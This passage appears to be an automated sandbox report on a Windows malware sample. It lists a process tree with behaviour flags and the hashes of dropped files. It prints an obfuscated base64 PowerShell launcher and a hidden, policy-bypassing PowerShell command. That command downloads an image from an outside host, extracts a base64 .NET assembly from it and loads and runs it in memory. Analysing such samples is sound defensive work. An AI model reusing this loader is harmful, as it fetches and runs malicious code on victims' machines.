JPKwaLiPNSKQmBlPKwaLiPNSKQmG4PKwaLiPNSKQmZPKwaLiPNSKQmBGPKwaLiPNSKQmGwPKwaLiPNSKQmYQBnPKwaLiPNSKQmCkPKwaLiPNSKQmOwPKwaLiPNSKQmkPKwaLiPNSKQmHMPKwaLiPNSKQmdPKwaLiPNSKQmBhPKwaLiPNSKQmHIPKwaLiPNSKQmdPKwaLiPNSKQmBJPKwaLiPNSKQmG4PKwaLiPNSKQmZPKwaLiPNSKQmBlPKwaLiPNSKQmHgPKwaLiPNSKQmIPKwaLiPNSKQmPKwaLiPNSKQmtPKwaLiPNSKQmGcPKwaLiPNSKQmZQPKwaLiPNSKQmgPKwaLiPNSKQmDPKwaLiPNSKQmPKwaLiPNSKQmIPKwaLiPNSKQmPKwaLiPNSKQmtPKwaLiPNSKQmGEPKwaLiPNSKQmbgBkPKwaLiPNSKQmCPKwaLiPNSKQmPKwaLiPNSKQmJPKwaLiPNSKQmBlPKwaLiPNSKQmG4PKwaLiPNSKQmZPKwaLiPNSKQmBJPKwaLiPNSKQmG4PKwaLiPNSKQmZPKwaLiPNSKQmBlPKwaLiPNSKQmHgPKwaLiPNSKQmIPKwaLiPNSKQmPKwaLiPNSKQmtPKwaLiPNSKQmGcPKwaLiPNSKQmdPKwaLiPNSKQmPKwaLiPNSKQmgPKwaLiPNSKQmCQPKwaLiPNSKQmcwB0PKwaLiPNSKQmGEPKwaLiPNSKQmcgB0PKwaLiPNSKQmEkPKwaLiPNSKQmbgBkPKwaLiPNSKQmGUPKwaLiPNSKQmePKwaLiPNSKQmPKwaLiPNSKQm7PKwaLiPNSKQmCQPKwaLiPNSKQmcwB0PKwaLiPNSKQmGEPKwaLiPNSKQmcgB0PKwaLiPNSKQmEkPKwaLiPNSKQmbgBkPKwaLiPNSKQmGUPKwaLiPNSKQmePKwaLiPNSKQmPKwaLiPNSKQmgPKwaLiPNSKQmCsPKwaLiPNSKQmPQPKwaLiPNSKQmgPKwaLiPNSKQmCQPKwaLiPNSKQmcwB0PKwaLiPNSKQmGEPKwaLiPNSKQmcgB0PKwaLiPNSKQmEYPKwaLiPNSKQmbPKwaLiPNSKQmBhPKwaLiPNSKQmGcPKwaLiPNSKQmLgBMPKwaLiPNSKQmGUPKwaLiPNSKQmbgBnPKwaLiPNSKQmHQPKwaLiPNSKQmaPKwaLiPNSKQmP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aLiPNSKQmEEPKwaLiPNSKQmPQPKwaLiPNSKQm9PKwaLiPNSKQmCcPKwaLiPNSKQmIPKwaLiPNSKQmPKwaLiPNSKQmsPKwaLiPNSKQmCPKwaLiPNSKQmPKwaLiPNSKQmJwBkPKwaLiPNSKQmGYPKwaLiPNSKQmZPKwaLiPNSKQmBmPKwaLiPNSKQmGQPKwaLiPNSKQmJwPKwaLiPNSKQmgPKwaLiPNSKQmCwPKwaLiPNSKQmIPKwaLiPNSKQmPKwaLiPNSKQmnPKwaLiPNSKQmGQPKwaLiPNSKQmZgBkPKwaLiPNSKQmGYPKwaLiPNSKQmJwPKwaLiPNSKQmgPKwaLiPNSKQmCwPKwaLiPNSKQmIPKwaLiPNSKQmPKwaLiPNSKQmnPKwaLiPNSKQmGQPKwaLiPNSKQmZgBkPKwaLiPNSKQmGYPKwaLiPNSKQmJwPKwaLiPNSKQmgPKwaLiPNSKQmCwPKwaLiPNSKQmIPKwaLiPNSKQmPKwaLiPNSKQmnPKwaLiPNSKQmGQPKwaLiPNSKQmYQBkPKwaLiPNSKQmHMPKwaLiPNSKQmYQPKwaLiPNSKQmnPKwaLiPNSKQmCPKwaLiPNSKQmPKwaLiPNSKQmLPKwaLiPNSKQmPKwaLiPNSKQmgPKwaLiPNSKQmCcPKwaLiPNSKQmZPKwaLiPNSKQmBlPKwaLiPNSKQmCcPKwaLiPNSKQmIPKwaLiPNSKQmPKwaLiPNSKQmsPKwaLiPNSKQmCPKwaLiPNSKQmPKwaLiPNSKQmJwBjPKwaLiPNSKQmHUPKwaLiPNSKQmJwPKwaLiPNSKQmpPKwaLiPNSKQmCkPKwaLiPNSKQm';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('PKwaLiPNSKQm','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/654/536/original/new_image.jpg?1698957750';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LnJvZmduL3l0aXNhdi9wb3QueW9jaXRpdXFlLy86cHR0aA==' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"4⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1828
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5e2c45d3d900d04171ee57f2464cc8b9e
SHA17ff9cc25dc9a218fd9b38378474e537ecde40ab9
SHA256136950fc2decb55f56e1d164ab4028a7b0145d49ec31efde3b8ac35a68e27d06
SHA512930d86ad84bf5eda7ecd4364c5aa2687eca6409a70f1e3efd7536515ce90c6ed5b48cb7a5cd102602c0264726484ad13cefc8c551275a48a18776a9c278cc9f6
-
Filesize
61KB
MD5f3441b8572aae8801c04f3060b550443
SHA14ef0a35436125d6821831ef36c28ffaf196cda15
SHA2566720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA5125ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9
-
Filesize
163KB
MD59441737383d21192400eca82fda910ec
SHA1725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA5127608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IATN24AJLXP128MO03WI.temp
Filesize7KB
MD56986373d35a03920d9e6e762a7c6240c
SHA1a28cabad53ffed36d7c03e97f0cc043a64d4c562
SHA256fe43bcb9e0d21a77786a9ebd39b82acd89e48795fb4ec1739105ea245992bdcc
SHA512f164686d02c13816f37af5f8071e5d2e9ae6dcb3f427dd65b39c65cb8b6955fdfe2152cc93679f9a2c03dfdc29ba2c0c45575daee221be17e599714bb34ffdd3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD56986373d35a03920d9e6e762a7c6240c
SHA1a28cabad53ffed36d7c03e97f0cc043a64d4c562
SHA256fe43bcb9e0d21a77786a9ebd39b82acd89e48795fb4ec1739105ea245992bdcc
SHA512f164686d02c13816f37af5f8071e5d2e9ae6dcb3f427dd65b39c65cb8b6955fdfe2152cc93679f9a2c03dfdc29ba2c0c45575daee221be17e599714bb34ffdd3
-
Filesize
193KB
MD5e2ee2593093262dbc88e11ce3e3f7669
SHA13c0cded1ad0a8abf8c6ba479caabf92a2815bec0
SHA256742e8072d0787f6114d3db4574fdddeab9870159e9002cfd5806e64f28391d58
SHA5127eb3d3228d01a46dc68457c4e85c5083a35b51ddd4174dd1c6cfac63ef2778a41540486c2c5af0a2a2c42cd701a0d794548b7b4410f87465a2c538fc9ea545e3
-
Filesize
193KB
MD5e2ee2593093262dbc88e11ce3e3f7669
SHA13c0cded1ad0a8abf8c6ba479caabf92a2815bec0
SHA256742e8072d0787f6114d3db4574fdddeab9870159e9002cfd5806e64f28391d58
SHA5127eb3d3228d01a46dc68457c4e85c5083a35b51ddd4174dd1c6cfac63ef2778a41540486c2c5af0a2a2c42cd701a0d794548b7b4410f87465a2c538fc9ea545e3